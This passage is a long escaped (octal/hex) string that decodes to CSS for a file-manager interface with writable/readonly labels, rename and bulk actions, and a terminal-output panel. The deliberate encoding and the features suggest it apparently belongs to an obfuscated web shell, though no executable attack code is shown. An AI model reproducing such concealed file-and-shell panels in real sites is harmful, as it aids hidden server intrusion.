20\61\x32\x70\170\x3b\15\12\40\x20\40\40\40\x20\x20\x20\40\40\x20\x20\146\x6f\156\x74\x2d\x73\151\172\145\x3a\x20\x31\x33\x70\x78\73\xd\xa\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\x66\157\156\x74\55\x77\145\151\147\150\164\x3a\x20\x34\60\60\73\15\12\40\40\x20\40\x20\40\x20\40\x20\40\x20\x20\x63\x75\x72\x73\x6f\162\x3a\x20\160\157\x69\156\x74\145\162\73\xd\12\40\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\164\162\141\156\x73\x69\x74\151\x6f\x6e\72\x20\141\x6c\x6c\40\x30\x2e\x31\65\163\x20\x65\141\x73\145\73\xd\xa\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\40\x66\157\x6e\164\55\146\141\x6d\151\x6c\171\x3a\40\55\141\x70\x70\154\x65\x2d\163\171\x73\x74\x65\x6d\54\40\102\x6c\x69\x6e\x6b\x4d\141\x63\x53\171\x73\x74\145\x6d\106\x6f\156\x74\x2c\x20\47\123\x65\147\x6f\145\40\x55\111\x27\x2c\40\x73\171\163\x74\145\x6d\x2d\165\151\x2c\x20\163\x61\x6e\x73\x2d\x73\x65\162\x69\x66\x3b\xd\xa\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\x77\x68\151\164\145\55\x73\x70\141\x63\145\72\40\156\157\x77\162\141\x70\73\15\12\40\40\40\40\40\40\x20\40\175\15\xa\40\x20\x20\40\40\x20\x20\x20\xd\xa\40\x20\x20\x20\40\40\x20\x20\x2e\142\164\156\72\x68\x6f\x76\x65\x72\40\173\15\xa\x20\40\40\40\x20\40\40\40\40\x20\40\40\142\141\x63\153\147\162\x6f\165\156\144\x3a\40\162\147\142\141\x28\x32\x35\x35\54\40\x32\x35\65\x2c\40\x32\x35\65\x2c\40\60\56\61\x29\x3b\15\xa\40\40\x20\40\40\x20\40\x20\40\x20\40\40\x62\x6f\x72\144\x65\x72\x2d\143\x6f\154\x6f\162\72\40\x72\x67\x62\141\x28\62\x35\x35\x2c\x20\62\65\65\x2c\40\x32\65\x35\x2c\40\60\56\61\x35\51\73\15\xa\40\40\40\40\40\x20\40\40\175\15\12\40\x20\40\40\40\40\x20\x20\15\12\x20\40\x20\40\40\40\x20\x20\56\142\x74\x6e\x3a\x61\x63\164\x69\166\145\x20\x7b\15\xa\40\x20\40\40\40\40\40\x20\40\x20\x20\x20\142\x61\x63\x6b\x67\162\157\x75\156\144\x3a\40\162\x67\x62\141\x28\62\65\x35\x2c\x20\62\x35\x35\54\40\62\65\65\54\40\x30\x2e\x30\x35\x29\73\xd\xa\40\40\x20\40\x20\x20\x20\40\x7d\15\12\40\40\40\40\40\40\40\x20\15\xa\x20\40\40\40\40\x20\x20\x20\x2e\x62\x74\156\55\x70\162\151\155\141\x72\x79\40\173\15\12\40\x20\x20\40\x20\x20\40\40\40\x20\40\x20\x62\x61\x63\x6b\x67\162\x6f\165\156\144\72\x20\x72\x67\x62\x61\x28\x33\x34\54\x20\61\x39\67\x2c\40\x39\64\x2c\40\x30\x2e\61\x35\51\73\15\12\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\x63\157\x6c\x6f\162\x3a\40\43\62\x32\143\65\x35\x65\x3b\15\xa\40\40\40\x20\x20\40\x20\40\40\x20\40\40\x62\x6f\162\x64\x65\162\x2d\x63\x6f\x6c\x6f\x72\x3a\x20\162\147\x62\x61\x28\63\64\x2c\x20\61\x39\67\x2c\40\x39\x34\54\40\x30\x2e\x33\x29\73\xd\xa\40\x20\40\x20\40\x20\40\40\x7d\15\xa\40\x20\x20\40\40\40\40\x20\15\12\40\40\x20\x20\x20\40\40\x20\x2e\x62\x74\156\x2d\160\x72\151\x6d\141\162\x79\72\x68\x6f\166\145\x72\x20\173\xd\12\x20\40\x20\40\40\x20\x20\x20\40\x20\40\x20\142\141\x63\153\147\162\x6f\x75\156\144\72\x20\x72\x67\142\x61\50\63\64\54\x20\61\71\67\54\x20\71\x34\54\40\60\x2e\x32\65\51\73\xd\xa\x20\40\40\40\40\x20\40\x20\40\40\40\40\142\157\162\x64\145\x72\x2d\143\x6f\x6c\157\x72\72\40\162\147\142\x61\x28\x33\64\54\40\61\71\67\54\40\71\64\54\40\60\x2e\64\x29\x3b\xd\xa\40\x20\40\40\x20\x20\40\40\175\15\12\x20\x20\x20\x20\x20\40\40\40\15\xa\40\40\40\x20\40\40\x20\40\x2e\142\164\x6e\x2d\x63\x72\145\x61\x74\x65\40\173\xd\xa\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\142\x61\143\x6b\x67\x72\157\165\156\144\x3a\x20\162\147\x62\x61\x28\x33\x34\x2c\x20\x31\71\67\54\40\x39\64\54\x20\x30\x2e\x31\x35\51\73\15\xa\40\40\x20\40\40\x20\x20\40\x20\x20\x20\40\x63\x6f\154\x6f\162\72\x20\x23\62\x32\x63\x35\x35\145\73\xd\12\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\x62\157\x72\x64\x65\162\55\143\x6f\x6c\157\162\72\x20\162\147\142\141\x28\x33\64\x2c\40\61\71\x37\x2c\x20\x39\64\x2c\40\60\x2e\x33\51\73\15\xa\40\x20\40\40\40\40\x20\40\x7d\15\xa\40\x20\40\40\40\40\40\40\15\12\40\40\40\x20\40\x20\x20\x20\x2e\142\164\x6e\x2d\x63\162\x65\141\164\x65\x3a\150\x6f\x76\145\162\40\x7b\xd\xa\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x62\141\143\x6b\147\162\157\165\156\144\72\40\x72\x67\142\x61\x28\x33\64\x2c\x20\x31\71\x37\54\40\x39\x34\54\x20\60\x2e\62\65\51\73\xd\xa\40\x20\40\x20\40\40\40\x20\40\40\x20\40\142\157\162\144\x65\162\55\x63\x6f\x6c\157\x72\72\40\162\147\x62\x61\50\63\64\x2c\40\x31\x39\x37\x2c\40\x39\x34\x2c\x20\x30\x2e\64\51\x3b\15\12\40\x20\x20\x20\40\40\40\x20\x7d\15\xa\40\x20\40\x20\x20\x20\40\x20\15\12\x20\40\x20\x20\x20\x20\40\x20\x2e\x62\x74\x6e\x2d\x64\141\x6e\x67\x65\162\40\173\xd\xa\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\40\x62\x61\143\x6b\x67\162\157\165\156\x64\x3a\40\162\x67\x62\x61\50\62\x33\x39\x2c\40\66\x38\54\40\x36\70\54\x20\60\x2e\61\x35\x29\x3b\15\xa\40\40\40\x20\40\40\x20\x20\40\x20\40\40\143\x6f\x6c\x6f\162\x3a\x20\x23\x65\146\64\64\x34\x34\x3b\xd\xa\x20\40\x20\40\40\x20\40\x20\x20\40\x20\x20\142\157\x72\x64\145\162\55\x63\157\154\157\162\72\x20\162\147\142\141\50\x32\63\71\x2c\x20\66\70\x2c\40\x36\x38\54\x20\60\x2e\x33\51\73\xd\xa\x20\40\40\x20\x20\40\x20\40\x7d\15\12\x20\x20\x20\x20\40\x20\x20\40\xd\12\40\40\x20\40\x20\40\40\40\x2e\x62\164\x6e\x2d\x64\x61\156\x67\145\x72\x3a\x68\157\166\145\162\x20\173\xd\xa\40\x20\40\x20\40\x20\40\40\40\40\x20\x20\142\141\x63\153\x67\x72\x6f\x75\156\x64\x3a\40\162\x67\142\x61\50\62\x33\x39\54\x20\x36\x38\54\x20\66\70\54\x20\x30\56\x32\x35\51\73\xd\12\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x62\x6f\162\144\145\x72\x2d\x63\x6f\154\157\162\72\x20\162\147\x62\x61\50\62\x33\71\x2c\40\66\70\54\40\x36\70\54\40\x30\x2e\64\x29\73\15\12\40\40\40\40\40\40\40\40\x7d\xd\xa\x20\40\x20\x20\40\40\40\x20\15\12\x20\x20\x20\40\40\x20\x20\x20\56\x62\164\156\x2d\163\x6d\x20\x7b\xd\12\40\40\40\x20\40\x20\40\x20\40\40\x20\40\x70\141\144\x64\151\156\147\x3a\x20\x34\x70\x78\40\x31\60\160\170\x3b\15\12\40\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\146\157\x6e\x74\55\163\151\172\x65\x3a\x20\61\62\160\x78\73\15\12\x20\x20\x20\x20\40\40\x20\x20\175\xd\xa\x20\40\40\x20\x20\x20\x20\x20\15\xa\40\x20\x20\x20\x20\40\40\x20\164\141\142\154\145\40\173\xd\xa\40\x20\x20\x20\40\x20\x20\x20\40\40\40\x20\167\x69\x64\x74\150\x3a\40\x31\x30\60\x25\x3b\15\xa\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\x62\x6f\x72\144\x65\162\x2d\143\x6f\x6c\x6c\x61\160\x73\x65\72\x20\143\x6f\x6c\154\141\x70\x73\145\x3b\15\12\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\x20\142\141\x63\153\147\162\x6f\165\x6e\x64\72\40\164\162\x61\156\x73\x70\x61\162\x65\x6e\164\73\15\12\x20\40\40\x20\40\40\40\x20\40\40\40\40\x62\x6f\x72\x64\145\x72\x3a\x20\x31\x70\x78\x20\163\157\x6c\151\x64\40\162\x67\142\141\x28\x32\65\65\x2c\x20\62\65\65\x2c\40\62\x35\65\x2c\x20\x30\x2e\x30\x38\51\73\xd\xa\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\x62\x6f\162\144\x65\162\55\162\141\144\151\x75\163\x3a\40\64\160\170\x3b\xd\12\40\x20\40\40\40\40\x20\40\40\40\x20\40\157\166\x65\x72\146\154\157\167\x3a\40\150\x69\144\x64\145\156\73\15\xa\x20\x20\x20\40\x20\x20\x20\x20\175\15\12\x20\x20\40\x20\40\40\40\40\xd\12\x20\40\40\x20\40\40\40\x20\x74\x68\145\141\144\40\x7b\15\12\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\40\142\x61\143\x6b\147\x72\157\x75\x6e\x64\x3a\x20\162\x67\142\x61\x28\62\x35\x35\x2c\40\62\65\65\54\40\62\65\65\x2c\40\x30\x2e\x30\63\x29\x3b\15\xa\x20\40\40\x20\40\x20\x20\x20\175\xd\12\x20\40\x20\40\40\x20\40\40\15\12\40\x20\40\40\40\40\40\x20\x74\x68\x20\x7b\15\12\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\40\160\141\144\x64\151\x6e\147\x3a\40\x38\160\170\x20\x31\x32\x70\170\x3b\15\xa\x20\x20\40\40\x20\x20\x20\40\x20\40\40\40\x66\x6f\x6e\x74\55\x77\x65\x69\x67\150\164\72\x20\x35\60\x30\x3b\xd\12\40\40\40\40\40\x20\x20\x20\x20\x20\40\40\x74\x65\x78\x74\x2d\x61\x6c\151\x67\156\x3a\x20\x6c\145\x66\x74\x3b\15\12\40\40\40\40\40\40\x20\40\40\x20\40\x20\143\157\154\x6f\162\72\x20\43\71\x63\141\63\x61\146\73\15\xa\40\x20\40\40\x20\40\x20\40\40\x20\40\x20\146\x6f\156\164\55\163\x69\172\145\x3a\x20\x31\62\x70\170\73\15\12\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\142\x6f\x72\144\x65\162\55\x62\157\164\x74\157\x6d\72\x20\x31\x70\x78\x20\163\157\x6c\151\x64\x20\x72\x67\x62\x61\50\x32\x35\x35\x2c\40\x32\65\65\54\40\62\65\65\54\40\x30\56\60\x38\x29\x3b\15\12\40\x20\40\x20\x20\40\x20\40\175\15\xa\x20\x20\40\x20\40\40\40\x20\15\12\x20\x20\40\x20\40\40\40\40\x74\x64\x20\173\15\xa\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\160\x61\x64\x64\x69\x6e\x67\x3a\40\x38\160\170\x20\x31\x32\160\x78\x3b\xd\12\40\40\x20\40\40\40\40\40\40\x20\40\40\x62\x6f\x72\x64\x65\162\55\164\x6f\x70\72\x20\61\x70\170\40\x73\x6f\x6c\x69\x64\40\x72\x67\142\141\x28\x32\x35\x35\54\40\x32\65\x35\54\40\x32\65\x35\x2c\40\x30\x2e\x30\x35\51\x3b\xd\12\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\146\x6f\156\x74\x2d\163\x69\172\x65\72\x20\x31\x33\x70\x78\73\15\xa\40\x20\40\40\x20\40\x20\x20\x7d\15\12\40\40\x20\40\x20\40\x20\40\15\12\x20\x20\x20\40\40\x20\x20\x20\x74\142\157\x64\171\40\x74\162\40\173\xd\xa\x20\x20\40\x20\40\40\40\40\x20\40\40\40\x74\162\x61\x6e\163\x69\164\151\x6f\x6e\x3a\x20\142\141\x63\x6b\147\162\157\x75\156\144\40\60\56\61\x35\163\40\x65\x61\x73\145\x3b\xd\xa\40\40\40\x20\x20\x20\40\x20\x7d\xd\xa\40\40\x20\40\x20\x20\x20\x20\xd\xa\40\40\x20\x20\x20\40\40\x20\164\x62\x6f\144\x79\40\x74\162\x3a\150\x6f\166\x65\x72\40\x7b\xd\12\40\x20\40\40\40\40\40\x20\40\40\40\x20\x62\141\143\x6b\x67\x72\157\x75\156\x64\x3a\40\162\147\142\x61\50\62\x35\x35\54\x20\x32\65\65\x2c\x20\x32\x35\x35\54\x20\x30\x2e\60\x33\51\x3b\xd\12\40\x20\x20\x20\x20\x20\x20\x20\x7d\15\xa\40\40\x20\40\40\40\x20\x20\xd\xa\40\40\x20\x20\x20\x20\40\x20\56\146\151\x6c\x65\55\151\143\157\x6e\40\173\xd\12\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\144\151\163\160\x6c\x61\171\72\40\x69\x6e\x6c\151\x6e\145\55\142\154\157\143\x6b\x3b\xd\12\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\167\151\x64\164\150\x3a\x20\x31\64\x70\x78\x3b\15\xa\40\x20\40\40\x20\x20\x20\x20\40\40\x20\40\x74\x65\x78\164\55\x61\x6c\x69\x67\x6e\72\x20\x63\145\x6e\x74\x65\x72\73\xd\12\40\40\40\x20\40\40\x20\x20\40\x20\x20\x20\x6d\x61\x72\x67\151\156\x2d\162\x69\x67\150\164\x3a\40\66\160\x78\73\xd\12\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x6f\x70\141\143\x69\x74\x79\x3a\40\60\56\x36\x3b\15\xa\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x66\x6f\156\x74\x2d\163\x69\x7a\145\72\x20\x31\x31\x70\170\73\xd\xa\40\x20\x20\x20\x20\x20\40\40\x7d\xd\xa\40\40\x20\x20\40\x20\x20\40\xd\xa\x20\x20\40\x20\40\x20\x20\x20\56\146\151\x6c\145\55\156\x61\155\x65\x20\x7b\xd\12\x20\40\40\40\x20\40\x20\x20\40\40\x20\x20\x63\x6f\154\x6f\162\72\x20\x23\145\x34\x65\x36\145\x62\73\xd\xa\40\x20\40\x20\40\40\x20\40\40\x20\40\x20\146\157\x6e\x74\x2d\167\145\x69\x67\150\x74\72\40\x34\60\x30\73\xd\xa\x20\40\x20\40\40\x20\x20\x20\x7d\xd\xa\40\40\40\40\x20\40\x20\x20\xd\12\x20\x20\40\x20\x20\x20\x20\40\56\x74\x79\x70\x65\55\x77\162\151\x74\x61\142\x6c\145\40\173\15\xa\40\40\40\x20\40\x20\40\x20\40\x20\x20\40\x63\x6f\154\x6f\162\72\x20\43\62\62\x63\65\65\x65\73\xd\12\40\x20\40\40\x20\40\40\x20\40\40\40\40\146\157\156\164\55\163\151\x7a\145\72\40\x31\x32\x70\170\x3b\xd\xa\40\40\x20\x20\x20\x20\x20\x20\x7d\xd\xa\x20\40\40\x20\x20\x20\x20\40\15\12\x20\x20\x20\x20\40\x20\40\x20\56\x74\x79\x70\x65\55\x72\145\141\144\x6f\156\154\171\40\x7b\xd\xa\x20\40\40\40\40\x20\40\x20\40\x20\40\40\143\x6f\154\x6f\162\72\40\x23\145\146\x34\64\x34\64\x3b\15\12\40\40\x20\x20\40\40\40\40\x20\x20\40\x20\x66\157\x6e\164\x2d\163\x69\172\x65\72\x20\x31\x32\160\170\x3b\xd\xa\40\40\x20\40\40\x20\40\x20\x7d\xd\xa\x20\x20\40\40\40\x20\40\40\15\12\40\40\40\x20\40\x20\40\40\x2e\141\143\x74\151\x6f\156\x2d\142\x75\164\164\x6f\156\x73\40\x7b\xd\12\x20\40\40\x20\x20\x20\40\40\40\x20\x20\x20\144\x69\x73\x70\154\x61\171\72\40\x66\154\145\x78\x3b\15\xa\x20\x20\40\40\x20\x20\40\40\x20\40\40\40\x67\141\160\72\x20\x34\x70\x78\x3b\xd\xa\40\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\146\154\145\170\x2d\x77\x72\x61\160\72\40\167\162\141\x70\x3b\15\12\40\40\40\40\x20\x20\x20\x20\x20\x20\40\40\152\165\163\x74\151\x66\x79\55\x63\x6f\156\164\x65\156\164\x3a\40\146\154\x65\x78\55\x65\x6e\144\73\15\xa\40\x20\40\40\x20\40\40\x20\175\15\12\x20\x20\x20\x20\40\x20\x20\x20\15\xa\x20\40\x20\x20\x20\40\x20\x20\56\x61\x63\x74\x69\x6f\x6e\x2d\142\165\x74\164\x6f\x6e\163\x20\x66\x6f\x72\x6d\40\173\xd\12\40\x20\x20\40\40\x20\x20\40\40\40\40\x20\155\141\162\x67\151\156\72\x20\60\73\15\xa\40\40\40\x20\x20\x20\x20\x20\x7d\xd\xa\40\x20\x20\40\x20\x20\40\x20\15\12\40\x20\x20\x20\40\x20\40\40\56\141\x63\164\x69\157\x6e\x2d\142\x75\x74\x74\157\x6e\x73\40\x2e\x62\164\x6e\40\173\xd\12\40\x20\x20\x20\40\x20\x20\40\40\40\x20\x20\160\141\x64\x64\151\156\147\x3a\x20\x34\160\170\40\x38\x70\170\x3b\xd\12\x20\40\40\40\40\40\x20\40\x20\40\x20\40\x66\157\156\x74\55\x73\x69\x7a\145\x3a\40\x31\62\x70\170\x3b\xd\12\40\x20\x20\40\40\40\40\40\175\xd\12\40\40\40\x20\40\x20\40\x20\15\12\x20\x20\x20\40\x20\x20\x20\40\56\x72\145\156\x61\x6d\x65\55\x66\157\162\155\x20\173\15\12\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\144\151\163\160\x6c\x61\171\x3a\40\146\154\x65\170\73\xd\xa\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x67\x61\x70\72\x20\x36\x70\x78\73\xd\12\40\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\141\154\151\147\156\x2d\x69\164\145\155\163\72\x20\143\x65\156\164\145\162\x3b\15\12\40\40\40\40\40\40\40\40\175\xd\xa\40\40\x20\40\x20\40\x20\x20\15\12\x20\x20\40\x20\40\40\x20\x20\x2e\162\x65\x6e\x61\155\x65\x2d\x66\x6f\x72\155\x20\x69\156\160\165\x74\40\x7b\15\xa\x20\40\x20\x20\40\40\x20\x20\40\x20\40\40\x66\x6c\145\x78\x3a\x20\x31\x3b\xd\xa\x20\x20\40\x20\40\40\40\x20\40\40\40\40\x70\x61\144\144\151\x6e\147\72\x20\64\x70\x78\40\x38\160\170\x3b\xd\xa\x20\x20\x20\x20\40\40\40\x20\40\40\x20\40\146\157\156\x74\x2d\x73\151\172\x65\x3a\x20\x31\63\x70\170\x3b\15\12\40\40\x20\x20\x20\40\40\40\x7d\xd\xa\x20\x20\40\x20\x20\x20\x20\40\15\xa\40\x20\40\40\40\40\40\40\56\143\x6f\144\x65\x2d\142\154\x6f\143\x6b\40\173\15\12\40\40\40\40\x20\40\40\40\x20\x20\40\x20\x62\x61\x63\x6b\x67\162\157\165\156\x64\x3a\x20\x72\x67\x62\x61\x28\x30\54\x20\60\54\40\60\54\40\x30\56\x33\x29\x3b\xd\12\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\142\157\x72\x64\145\162\72\40\x31\160\x78\x20\x73\157\x6c\151\144\x20\162\x67\x62\x61\x28\62\65\65\x2c\x20\62\65\65\54\40\x32\65\x35\54\40\x30\x2e\60\x38\x29\x3b\15\xa\40\x20\x20\x20\40\x20\40\40\40\x20\40\40\142\x6f\x72\144\145\162\55\x72\141\x64\x69\x75\x73\72\x20\64\160\170\x3b\xd\12\40\x20\x20\x20\x20\40\x20\x20\40\40\40\40\160\141\x64\x64\151\156\x67\x3a\40\61\62\x70\170\x3b\15\12\x20\40\x20\x20\40\x20\40\40\40\40\x20\40\x66\157\156\x74\55\x66\141\155\x69\x6c\171\72\x20\47\x53\106\x20\x4d\x6f\156\x6f\x27\54\40\115\x6f\156\x61\143\157\54\x20\x27\x43\x61\x73\x63\141\x64\151\x61\40\x43\x6f\144\145\47\x2c\x20\x27\x52\157\142\x6f\164\157\x20\x4d\x6f\x6e\157\47\54\x20\103\157\x6e\163\157\x6c\141\163\54\x20\x27\103\157\165\x72\x69\145\x72\x20\x4e\145\x77\x27\x2c\40\x6d\157\156\157\163\160\141\x63\x65\x3b\15\xa\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x66\157\156\x74\55\163\x69\172\x65\x3a\40\x31\62\160\170\73\15\xa\x20\x20\40\40\40\40\40\40\x20\x20\x20\40\x6c\151\156\x65\55\x68\x65\151\147\150\x74\72\x20\61\x2e\x35\73\xd\12\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\x63\x6f\154\157\162\x3a\x20\x23\145\x34\145\x36\x65\142\73\xd\12\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x6f\x76\145\x72\146\x6c\x6f\x77\x2d\170\72\x20\141\165\x74\x6f\73\xd\xa\40\x20\40\x20\x20\x20\40\40\x20\40\40\x20\x77\x68\x69\164\x65\x2d\x73\160\x61\x63\145\x3a\40\x70\162\x65\73\15\xa\40\x20\x20\40\x20\40\40\40\x7d\xd\12\x20\40\x20\x20\40\x20\40\x20\xd\12\40\x20\40\x20\40\x20\x20\x20\56\x74\145\x72\155\151\x6e\141\154\55\157\165\164\160\165\x74\40\x7b\xd\12\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\142\141\x63\x6b\x67\162\x6f\x75\x6e\x64\x3a\x20\162\147\x62\141\x28\x30\54\40\60\x2c\x20\60\54\x20\x30\56\63\x29\x3b\15\12\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\40\142\x6f\162\144\145\x72\x3a\40\61\160\x78\40\163\x6f\154\x69\x64\x20\x72\x67\x62\x61\50\63\64\54\40\x31\71\x37\x2c\40\71\x34\54\x20\60\56\x33\x29\73\15\12\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x62\x6f\x72\144\x65\x72\x2d\162\141\144\x69\165\163\72\x20\64\160\170\73\xd\xa\40\40\40\40\40\40\x20\40\40\40\40\40\160\x61\144\x64\151\x6e\147\x3a\x20\x31\x32\160\170\x3b\15\12\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\146\157\156\164\55\146\x61\155\x69\x6c\x79\x3a\x20\47\123\x46\40\115\157\x6e\x6f\47\54\x20\x4d\157\156\141\143\157\x2c\x20\47\103\141\x73\x63\141\144\151\141\x20\x43\x6f\144\x65\47\x2c\x20\47\x52\157\142\157\x74\157\40\x4d\x6f\x6e\x6f\47\x2c\40\103\157\156\163\x6f\x6c\x61\163\54\x20\47\103\157\165\162\151\x65\162\x20\116\145\167\x27\x2c\40\155\x6f\x6e\157\163\160\141\143\x65\x3b\xd\xa\x20\40\40\x20\x20\40\40\x20\40\x20\x20\40\x66\x6f\156\x74\55\163\151\172\x65\x3a\x20\61\62\x70\x78\73\xd\xa\40\x20\40\40\x20\40\x20\40\x20\40\40\x20\x63\157\154\x6f\162\x3a\40\43\x32\62\x63\x35\x35\x65\x3b\xd\xa\x20\40\x20\40\x20\x20\x20\40\40\x20\40\x20\157\166\x65\162\146\x6c\x6f\x77\x2d\170\x3a\x20\141\165\x74\157\73\xd\12\x20\x20\x20\40\40\40\40\40\40\40\40\40\x77\x68\151\164\x65\55\x73\160\141\143\145\72\40\x70\x72\145\x3b\xd\xa\40\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\154\x69\156\145\55\x68\x65\151\x67\150\164\72\x20\61\x2e\65\x3b\xd\12\40\x20\40\x20\x20\40\x20\40\x7d\xd\xa\40\x20\40\40\x20\40\x20\x20\15\12\40\40\40\40\x20\40\40\40\56\147\162\x69\144\x2d\x32\40\173\15\12\40\40\x20\40\40\x20\40\x20\40\40\40\40\144\x69\163\160\x6c\x61\x79\x3a\40\147\x72\x69\144\x3b\15\xa\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\147\162\151\x64\x2d\164\x65\x6d\x70\154\141\x74\x65\55\143\157\154\x75\x6d\x6e\x73\x3a\x20\x31\146\x72\x20\x31\146\162\x3b\15\12\40\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x67\x61\160\72\40\61\62\x70\170\x3b\xd\xa\x20\40\x20\x20\40\x20\40\40\x7d\xd\12\x20\40\x20\x20\40\x20\x20\40\15\xa\40\40\x20\x20\40\40\x20\x20\x40\155\x65\144\151\x61\x20\x28\x6d\x61\170\55\x77\151\144\x74\150\x3a\x20\67\66\x38\160\170\x29\40\x7b\xd\12\40\40\x20\40\40\40\x20\40\x20\40\x20\40\x2e\x67\162\x69\144\55\x32\x20\173\15\12\40\x20\x20\40\40\x20\40\40\40\40\40\x20\40\40\x20\x20\147\x72\x69\144\x2d\164\145\x6d\160\154\141\x74\145\55\x63\157\154\x75\x6d\x6e\163\72\x20\61\146\162\73\xd\12\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\175\15\xa\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\xd\xa\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\x62\157\x64\x79\x20\173\15\xa\x20\40\x20\40\x20\x20\40\40\x20\40\x20\40\40\40\40\40\x70\141\x64\144\151\156\147\72\40\61\x32\160\170\73\15\xa\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\175\15\xa\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\15\12\x20\x20\x20\40\40\40\40\x20\40\40\x20\40\56\141\x63\x74\151\x6f\x6e\55\142\x75\x74\164\x6f\156\x73\x20\173\15\12\x20\x20\x20\40\40\40\x20\40\40\40\x20\40\40\x20\x20\40\x6a\165\163\164\151\146\171\55\x63\x6f\x6e\x74\145\156\x74\72\40\x66\154\x65\x78\55\x73\164\x61\x72\x74\x3b\xd\12\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x7d\15\xa\x20\40\40\40\x20\x20\x20\x20\x7d\15\xa\x20\x20\x20\40\40\x20\x20\x20\15\12\40\x20\40\40\x20\x20\40\x20\x2e\x75\160\x2d\x62\164\x6e\40\173\15\12\x20\x20\40\40\x20\x20\40\40\40\x20\x20\x20\142\x61\143\x6b\147\x72\x6f\165\x6e\x64\x3a\40\x72\x67\142\141\x28\62\x35\65\54\x20\x32\x35\65\54\40\x32\x35\x35\x2c\x20\60\56\60\66\51\73\15\12\40\x20\x20\40\x20\40\x20\40\x20\40\x20\40\x62\157\162\144\145\x72\x3a\40\x31\160\170\40\x73\157\154\151\x64\40\x72\147\142\141\50\x32\65\x35\x2c\40\62\65\x35\54\x20\x32\x35\65\x2c\x20\x30\x2e\61\x29\73\xd\xa\x20\40\40\40\x20\40\40\40\40\40\40\x20\x63\x6f\x6c\157\x72\x3a\40\43\145\64\x65\66\x65\142\73\15\12\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\155\141\162\147\151\156\55\142\x6f\164\164\x6f\x6d\72\x20\x31\62\160\170\73\15\xa\x20\x20\40\x20\40\x20\40\x20\40\40\40\40\144\151\x73\x70\154\141\x79\72\40\151\x6e\154\151\156\145\55\146\x6c\145\170\x3b\15\xa\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\x61\154\151\147\x6e\x2d\151\164\145\155\x73\x3a\40\143\145\x6e\164\145\162\73\15\xa\x20\40\40\40\40\40\x20\40\40\40\40\40\147\141\160\72\40\66\160\x78\x3b\xd\xa\x20\40\40\x20\x20\x20\40\40\175\15\12\40\x20\40\x20\40\40\x20\40\xd\12\x20\40\40\x20\x20\40\x20\x20\56\165\x70\x2d\x62\x74\x6e\72\150\x6f\x76\x65\162\x20\x7b\15\12\40\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x62\x61\143\x6b\147\162\x6f\165\156\x64\x3a\40\162\x67\x62\x61\50\62\65\65\54\x20\x32\65\x35\54\40\62\65\65\54\x20\x30\56\x31\51\x3b\xd\xa\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\142\157\x72\x64\x65\x72\55\x63\157\154\x6f\162\x3a\x20\x72\x67\x62\x61\x28\62\x35\65\x2c\40\62\x35\x35\54\40\62\65\65\54\x20\60\56\61\x35\51\73\15\12\x20\40\40\x20\x20\40\x20\40\175\15\12\40\x20\40\40\40\x20\40\x20\xd\12\40\40\40\40\40\x20\x20\40\x2e\142\165\154\x6b\55\x61\x63\164\151\x6f\156\x73\x20\173\xd\12\40\x20\40\40\40\x20\40\x20\x20\x20\40\40\x64\x69\x73\160\x6c\141\171\72\40\146\x6c\x65\170\x3b\15\xa\x20\x20\40\40\x20\40\x20\40\x20\x20\40\x20\x67\141\x70\x3a\40\70\160\170\73\xd\12\40\40\40\40\x20\40\40\x20\x20\x20\x20\x20\x61\x6c\151\147\x6e\55\151\164\145\x6d\x73\x3a\40\143\145\x6e\164\x65\x72\73\15\12\x20\x20\x20\x20\40\x20\40\40\x20\40\40\40\x6d\141\x72\x67\x69\x6e\x2d\142\x6f\x74\164\x6f\x6d\72\40\61\62\x70\x78\x3b\15\12\40\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\160\x61\144\144\151\156\x67\72\40\61\62\160\x78\73\xd\xa\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\x62\141\143\x6b\x67\162\x6f\165\x6e\x64\72\40\162\x67\142\141\x28\x32\x35\65\54\x